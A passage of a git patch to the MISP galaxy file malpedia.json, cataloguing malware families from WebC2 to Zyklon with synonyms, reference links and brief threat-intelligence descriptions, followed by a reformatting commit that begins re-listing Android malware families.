+ "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
+ "value": "WebC2-Kt3",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
+ "value": "WebC2-Qbp",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
+ "value": "WebC2-Rave",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
+ "value": "WebC2-Table",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": 
"b459033c-2d19-49aa-a21f-44a01d1a4156",
+ "value": "WebC2-UGX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
+ "value": "WebC2-Yahoo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor",
+ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+ ]
+ },
+ "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4",
+ "value": "WebMonitor RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess",
+ "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html"
+ ]
+ },
+ "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
+ "value": "WellMess",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire",
+ "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/"
+ ]
+ },
+ "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2",
+ "value": "WildFire",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
+ "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ ]
+ },
+ "uuid": "6a100902-7204-4f20-b838-545ed86d4428",
+ "value": "WinMM",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti",
+ 
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
+ "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html",
+ "https://github.com/TKCERT/winnti-nmap-script",
+ "https://github.com/TKCERT/winnti-suricata-lua",
+ "https://github.com/TKCERT/winnti-detector"
+ ]
+ },
+ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
+ "value": "Winnti",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader",
+ "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ ]
+ },
+ "uuid": "db755407-4135-414c-90e3-97f5e48c6065",
+ "value": "Winsloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ ]
+ },
+ "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
+ "value": "Wipbot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Wimmie",
+ "Syndicasec"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost",
+ "https://secrary.com/ReversingMalware/WMIGhost/",
+ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
+ ]
+ },
+ "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40",
+ "value": "WMI Ghost",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322",
+ "value": "WndTest",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu",
+ "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
+ ]
+ },
+ "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9",
+ "value": "Wonknu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody",
+ "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814"
+ ]
+ },
+ "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52",
+ "value": "woody",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "WoolenLogger"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger",
+ "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf"
+ ]
+ },
+ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267",
+ "value": "Woolger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "splm",
+ "chopstick"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent",
+ "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf"
+ ]
+ },
+ "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
+ "value": "X-Agent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos",
+ "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
+ ]
+ },
+ "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436",
+ "value": "XBot POS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
+ ]
+ },
+ "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed",
+ "value": "XBTL",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan",
+ "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/",
+ "https://securelist.com/blog/research/78110/xpan-i-am-your-father/"
+ ]
+ },
+ "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993",
+ "value": "Xpan",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Expectra"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra",
+ "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
+ "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
+ ]
+ },
+ "uuid": "5f9ba149-100a-46eb-a959-0645d872975b",
+ "value": "XPCTRA",
+ "description": "Incorporates code of Quasar RAT."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc",
+ "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
+ ]
+ },
+ "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae",
+ "value": "XP PrivEsc (CVE-2014-4076)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "nokian"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
+ "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ ]
+ },
+ "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63",
+ "value": "xsPlus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "xaps"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/",
+ "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf",
+ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
+ "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
+ "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf"
+ ]
+ },
+ "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74",
+ "value": "X-Tunnel",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ShadowWalker"
+ ],
+ "type": [],
+
"refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
+ ]
+ },
+ "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb",
+ "value": "xxmm",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "KeyBoy"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah",
+ "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ ]
+ },
+ "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
+ "value": "Yahoyah",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "bbsinfo",
+ "aumlib"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih",
+ "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html"
+ ]
+ },
+ "uuid": "81157066-c2f6-4625-8070-c0a793d57e18",
+ "value": "yayih",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "DarkShare"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus",
+ "https://www.youtube.com/watch?v=AUGxYhE_CUY"
+ ]
+ },
+ "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571",
+ "value": "YoungLotus",
+ "description": "Simple malware with proxy/RDP and download capabilities. 
It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty",
+ "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
+ "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
+ ]
+ },
+ "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200",
+ "value": "yty",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zekapab"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
+ ]
+ },
+ "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
+ "value": "Zebrocy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+ ]
+ },
+ "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0",
+ "value": "Zebrocy (AutoIT)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
+ ]
+ },
+ "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa",
+ "value": "Zedhou",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Max++",
+ "Smiscer"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
+ "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/",
+
"https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
+ "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
+ "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html"
+ ]
+ },
+ "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
+ "value": "ZeroAccess",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil",
+ "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil"
+ ]
+ },
+ "uuid": "585f9f75-1239-4561-8815-c5ae033053a1",
+ "value": "ZeroEvil",
+ "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. 
Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot",
+ "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+ ]
+ },
+ "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
+ "value": "ZeroT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zbot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
+ "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
+ "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
+ "https://www.secureworks.com/research/zeus?threat=zeus",
+ "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
+ "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
+ "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "http://eternal-todo.com/blog/zeus-spreading-facebook",
+ "http://eternal-todo.com/blog/new-zeus-binary",
+ "http://eternal-todo.com/blog/detecting-zeus",
+ "https://www.mnin.org/write/ZeusMalware.pdf",
+ "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
+ "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
+ "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
+ "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
+ "https://zeustracker.abuse.ch/monitor.php",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html"
+ ]
+ },
+ "uuid": 
"4e8c1ab7-2841-4823-a5d1-39284fb0969a",
+ "value": "Zeus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
+ ]
+ },
+ "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3",
+ "value": "Zeus MailSniffer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
+ "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/",
+ "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
+ "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/"
+ ]
+ },
+ "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4",
+ "value": "Zeus Sphinx",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl"
+ ]
+ },
+ "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0",
+ "value": "Zeus SSL",
+ "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin",
+ "https://twitter.com/siri_urz/status/923479126656323584",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877"
+ ]
+ },
+ "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
+ "value": "Zezin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614",
+ "value": "ZhCat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "989330e9-52da-4489-888b-686429db3a45",
+ "value": "ZhMimikatz",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zeus Terdot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/",
+ "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/"
+ ]
+ },
+ "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed",
+ "value": "Zloader",
+ "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "gresim"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng",
+ "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
+ ]
+ },
+ "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7",
+ "value": "ZoxPNG",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Sensocode"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
+ "https://blogs.cisco.com/security/talos/opening-zxshell",
+ "https://blogs.rsa.com/cat-phishing/",
+ "https://github.com/smb01/zxshell"
+ ]
+ },
+ "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
+ "value": "ZXShell",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon",
+ "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html"
+ ]
+ },
+ "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722",
+ "value": "Zyklon",
+ "description": ""
+ }
+ ],
+ "version": 1649,
+ "source": "Malpedia",
+ "name": "Malpedia",
+ "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"
 }
From 2d2749cceac2b4ffaae994982640d8f61fc59fc6 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 10 Oct 2018 22:12:59 +0200 Subject: [PATCH 2/2] jq all the things
---
 clusters/malpedia.json | 31904 +++++++++++++++++++-------------------- 1 file changed, 15952 insertions(+), 15952 deletions(-)
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 256f76f..42f230d 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -1,15954 +1,15954 @@
 {
- "description": "Malware galaxy cluster based on Malpedia.",
- "type": "malpedia",
- "authors": [
- "Daniel Plohmann",
- "Steffen Enders",
- "Andrea Garavaglia",
- "Davide Arcuri"
- ],
- "values": [
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine",
- "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/"
- ]
- },
- "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d",
- "value": "AdultSwine",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
- "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
- "https://github.com/DesignativeDave/androrat"
- ]
- },
- "uuid": "80447111-8085-40a4-a052-420926091ac6",
- "value": "AndroRAT",
- "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/",
- "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf"
- ]
- },
- "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184",
- "value": "AnubisSpy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut",
- "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
- "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
- ]
- },
- "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
- "value": "Bahamut",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/"
- ]
- },
- "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
- "value": "BankBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites",
- "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang",
- "https://www.youtube.com/watch?v=1LOy0ZyjEOk"
- ]
- },
- "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
- "value": "Catelites",
- "description": "Catelites Bot 
(identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
- "http://blog.checkpoint.com/2017/01/24/charger-malware/",
- "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
- ]
- },
- "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561",
- "value": "Charger",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Pegasus",
- "JigglyPuff"
- ],
- "type": [],
- "refs": [
